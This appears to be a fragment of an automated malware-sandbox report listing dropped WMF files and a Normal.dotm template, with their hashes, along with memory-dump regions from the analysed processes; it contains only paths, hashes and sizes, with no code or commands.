ebe2a4f34839a6a4749c17be1d8255936c46083a73fc2b42ada908437a94e5dc9e1f3c0fde1acb1b5158d963ca6ef4743b608b77f4b6ff7c8a5926a6789ffeff

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\65E1A132.wmf

Filesize
444B

MD5
01a86694f166e9a5b0ac1a3715fddb64

SHA1
ed6624e8fbb24ca93bd4842ae3fc913358950dd3

SHA256
1b8b891a93f5ab70aa707671b73503927780a81163b07971e0a11d0d1ad47f58

SHA512
42205be4132dbe098b56ea3c0789487eacf1d735f32115cd18239dbeb69abe5ff2c7ba82cbc264edbb086a9069d2493ea0e655de860916d82019ab10525f6c7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67D389E.wmf

Filesize
444B

MD5
302666893369fcad18921ad5f2e8a66e

SHA1
4d73790b52ea64b5ce34cdbd295d2cef3e7a60b3

SHA256
4167b674a1c5b284c45480999e292ecf9d2594e595cdfd193369d6afde60abda

SHA512
68b4f11c45d17638c2abd929078f8779fc4359c0d0c5d6aad92b8755d47a1983551dffa514ca6230fe49ad94bdf40a341e2bc91eedfbd30e7bb1a0e98ee9d78d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\76A9F5AC.wmf

Filesize
444B

MD5
35444b3bf14592a50ebf52631c2fb20b

SHA1
c6b3bcdcebeec619d35abeb1f89b62bdc5bff320

SHA256
e03e6308e45c744712129361d920d3a97e4acb83eb183718e39074dd7258f470

SHA512
89669bb5d4acda1122935518a70f278d5c2acfa3ad884aabed0af19d5431764228a5fa8c5a68feab8daaaaccb2d6d7048b1817888329610cdd79d60f105f0d3d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7FDF11D4.wmf

Filesize
444B

MD5
b585caa1247f3fcf97a544314432e9ff

SHA1
c87507239f52386d81587064f1a12d7a0cd0546c

SHA256
3edbfcd4b715df1409d87ab08c1b54154b87b012d35582c6933a6d5986253ce5

SHA512
83ba66e30a28c2acb8776e601e1995fbe665501086cf343ca4a99faf0767df81ab8c29369580376d675c75e2b45ff58b0f39072e426edecb3b17e5cea084624e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83D927B8.wmf

Filesize
444B

MD5
61c65b6f01e3a06aa4a68e2a470efebf

SHA1
6ee1f8858d1e8dcec2fa9dac62036b6571676377

SHA256
a5d9955f2a2cae1508aba8208e4dc6b5f4803ce5d61b073b20a653aac78950a3

SHA512
068150fc621aac8a8a83d1789f4f887be3960e3c518cf359047546f025d7b45f7bd32e3c1049f93cb6aa2febf30712ce70bd7f4476fe8ba6f415624c5bfd0da5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87245B02.wmf

Filesize
444B

MD5
5e5f02c2a94fd54e43f5947f2fb43292

SHA1
b90f6a992079d027c56354db574f6226f88a3c20

SHA256
3300290bac846c44bc32be3fd86a53da1a40e76e0bbb4e1efd3da14c623d25bf

SHA512
59715c69e8081434bf10a72bb297d122ae460723f115b72ddbe80383c04b11921053c582cc9680bb3b1270aaa89bd69ae30b9bb99efcd6ae250140a93ec0e3e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98061356.wmf

Filesize
444B

MD5
28e82d3139f081d2fe1cdfe8e9a520c1

SHA1
080916cb77868d1c5a0bd9875ef47988e6f68ec5

SHA256
4c6dfb3673d17a9fae587ce35d658a87e31176022e8db09388e7cc147d0bcd7f

SHA512
69e242a61d7e817ef6d9442fc93c77e28f808f72491ae6395d22c78f7aba8c260915daa50d4c53dde8a686e18232b65b26c9e25d2290cf943e3d1ec46281de79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C36649A.wmf

Filesize
444B

MD5
9dafe3c61d571ac8e2117d3e5a16c6e9

SHA1
f721076c8b69af01f86fdc2978b028ce0e8862b2

SHA256
c2b395327fa270e3118b73c6566678849eac7eefe0ca72491b2d141536da5ffb

SHA512
e00444bade72dd84e669009570a26b34793c3913e684eb195519c121bf93a05a97fc5c40bfd4dd206635e1fc28c3c9dc5325cb8eb712117f7b482bc08e5428be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5695484.wmf

Filesize
444B

MD5
15b39e7044b5d7a08c84cf4df82fdfb8

SHA1
cec082086708f4ef7bb777b74a2a1b53ea47df49

SHA256
6aeb29d64667dc580c7b215ca27cf654ef3b73320436e384e591902b69a49c4b

SHA512
9400418666bc6fb6a632b615b857c2f9ea6e9991ca918cc408e4beb254e585e044850a8661a09976047cb35d2a624196b7bd8bfa0a7196ecde7c39043ad04f8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DDAC8E5C.wmf

Filesize
444B

MD5
8943eacf5e9cb2c96286fa6fa74336ef

SHA1
0c3a4be150bc3d9b1fae305fcdf0b7671cc52288

SHA256
7ea5b31a12509e07985b095ae0dc01c80b2c1a5a660f881a670a81673586cdda

SHA512
8f2428ae92fb08e8168a94d79f17ca3d8a655af662509882bca760490c2f5b8baba207a92f450c21172104a26f4eba21e7368151febae70a6a87cd146f3b31c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E07F223E.wmf

Filesize
444B

MD5
741ec1467cae209f92fc63ca489297ac

SHA1
224eab75c46430d4e8a0194f8fe634ab8df81feb

SHA256
24aab603921832e2971f11fc42cb9d4fdbeefa9da3c92cb9fb9add3a7fae5172

SHA512
e3cbd3ac51c047002617511c69c26217792180adab1c141297aac2ce3a7c73193b307843c9e5e8b3e610e34d3733874227a7f2675e35acb39671cfbd32b932d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3E548FC.wmf

Filesize
444B

MD5
b10aed3746fa0f00611a8e61b525f825

SHA1
f04b59fee241f4e6503de8a3b65a5b29eca55791

SHA256
d5ae3a83675a7889c11fa9a6d9ab1d9d8ee82ac256fc3b9d1403f0b9d9690cd8

SHA512
cd207178b6c47b7da4404d4fb822727cc773712f5905a25a8c185c7a4cf68455d377973539b1af357cfd6770437c535b033bdb1d992eedc3f0e65ab73ed5e912

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

Filesize
20KB

MD5
47b0a3a003c124f44db3121848b3ffb9

SHA1
d4c1ecaf0c97cffe74bb216d04ce000fabdb3940

SHA256
6ccb4c52b837035ccf606ab3b40a648c564ee4ebf58ffdf9136b3a7371cfe891

SHA512
325287998a2255de5834e93abdf7605fde88e75723083bee3387ed861462599d9f78c193b58b41aac0334fbf7c611c01655a7fc5a48f37f677cd1920411b78b2

Download Submit
memory/2268-161-0x0000000006230000-0x0000000006330000-memory.dmp

Filesize
1024KB

Download
memory/2268-169-0x0000000006230000-0x0000000006330000-memory.dmp

Filesize
1024KB

Download
memory/2268-2-0x0000000070BAD000-0x0000000070BB8000-memory.dmp

Filesize
44KB

Download
memory/2268-118-0x00000000006F0000-0x00000000007F0000-memory.dmp

Filesize
1024KB

Download
memory/2268-117-0x00000000006F0000-0x00000000007F0000-memory.dmp

Filesize
1024KB

Download
memory/2268-116-0x00000000006F0000-0x00000000007F0000-memory.dmp

Filesize
1024KB

Download
memory/2268-122-0x00000000006F0000-0x00000000007F0000-memory.dmp

Filesize
1024KB

Download
memory/2268-0-0x000000002FA91000-0x000000002FA92000-memory.dmp

Filesize
4KB

Download
memory/2268-165-0x0000000006230000-0x0000000006330000-memory.dmp

Filesize
1024KB

Download
memory/2268-164-0x0000000006230000-0x0000000006330000-memory.dmp

Filesize
1024KB

Download
memory/2268-166-0x00000000006F0000-0x00000000007F0000-memory.dmp

Filesize
1024KB

Download
memory/2268-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2268-168-0x00000000006F0000-0x00000000007F0000-memory.dmp

Filesize
1024KB

Download
memory/2268-254-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2268-327-0x0000000070BAD000-0x0000000070BB8000-memory.dmp

Filesize
44KB

Download
memory/2268-235-0x0000000070BAD000-0x0000000070BB8000-memory.dmp

Filesize
44KB

Download
memory/2268-236-0x00000000006F0000-0x00000000007F0000-memory.dmp

Filesize
1024KB

Download
memory/2268-237-0x0000000006230000-0x0000000006330000-memory.dmp

Filesize
1024KB

Download
memory/2268-238-0x0000000006230000-0x0000000006330000-memory.dmp

Filesize
1024KB

Download
memory/2268-7-0x0000000006540000-0x0000000006640000-memory.dmp

Filesize
1024KB

Download
memory/2336-180-0x00000000021E0000-0x00000000021E8000-memory.dmp

Filesize
32KB

Download
memory/2336-179-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download